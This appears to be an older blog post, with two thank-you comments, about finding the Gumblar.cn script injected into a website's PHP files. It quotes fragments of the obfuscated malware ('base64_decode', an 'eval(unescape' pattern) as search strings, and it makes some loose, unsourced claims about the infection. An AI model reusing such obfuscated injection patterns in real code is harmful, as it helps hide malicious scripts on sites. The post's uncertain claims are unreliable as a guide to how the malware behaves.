Gumblar.cn is a website that's been listed as suspicious and contains several exploit scripts and trojans that might harm and infect computers. You may have come across it or noticed that a site is 'connecting to gumblar.cn'in the left-hand corner of the Firefox browser? The scary thing is that 99% of browsers never spot it. If you regularly scan your server for vulnerabilities and have tight security then you should have noticed it by now, but it's always useful to check.
If your site has been 'injected' with the script there are several forums currently trying to solve the problem. As yet I haven't come across a solid solution as it appears that the script which is injected (which hijacks the site) changes from the original code to which pages it affects. Annoying if you have 6000+ pages of course : ) . As the virus obfuscates the script (some characters are replaced with their numeric codes) it's very hard to find it, let alone remove it!
How to find it:
As the script varies from machine to machine it's of course tricky to locate so I will only mention how I discovered the virus on a colleague's website. I first came across a file named image.php which was stored in the images folder (which now has been renamed to something else) which stored this code section:
base64_decode( mumbo-jumbo here)
This basically decodes whatever the main code is elsewhere in other files and sends the info to the Gumbar website to do, most likely, unpleasant things with your information.
So, I found the decoder, now all I had to do was to locate the main script. After reading a wide selection of posts about the topic (some listed below) I started searching for different script snippets using Windows Search (words and phrases in the file) and eventually I found the one that matched my files:
.replace(/#/g,'%');eval(unescape
...and there it was in the middle of the code: 75mbla#hidden!
I am not sure how it managed to get in, so to speak. Various posts suggest different things. The best thing to do it seems is to:
- Keep a tight ship: scan and check your server regularly and keep a secure password which cannot be guessed or hacked easily.
- Keep User Input Secure: Most sites have some form of user interaction so make sure that your script filters metacharacters from user input.
- Validate users' input to remove harmful code (thanx deKay for useful bit of information).
It doesn't seem that this virus is either keylogging your machine or collecting data, however info is still not 100% solid. Google reports the site:
"Site is listed as suspicious - visiting this website may harm your computer. [These] [a]ttack sites try to install programs that steal private information, use your computer to attack others, or damage your system.
Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners."
but also states that:
"Over the past 90 days, gumblar.cn did not appear to function as an intermediary for the infection of any sites."
Here are a few tools and websites that are useful to the problem:
Discussions about possible solutions:
Virus-Code Injected in PHP File of website
Great post: 12 Facts about the injected script
Good tools to get you started:
Top 10 Web Vulnerability Scanners
The Acunetix free edition has been used by a colleague of mine
Acunetix Security Scanner - Free Edition
Good luck!
Posts
3 years ago
2 comments:
Thank you! Spend literally hours and hours trying to find it. I had the same problem as you and I'm very pleased. Its hard because if you're running a commericial site like mine then users' experiences and safety is at risk so you wouldn't believe how relieved I am to have managed to track down this solution.
Thank you yet again.
H
Hi Henrik,
I'm glad you found the solution to work for your website as well.
Best wishes,
Johannes
Post a Comment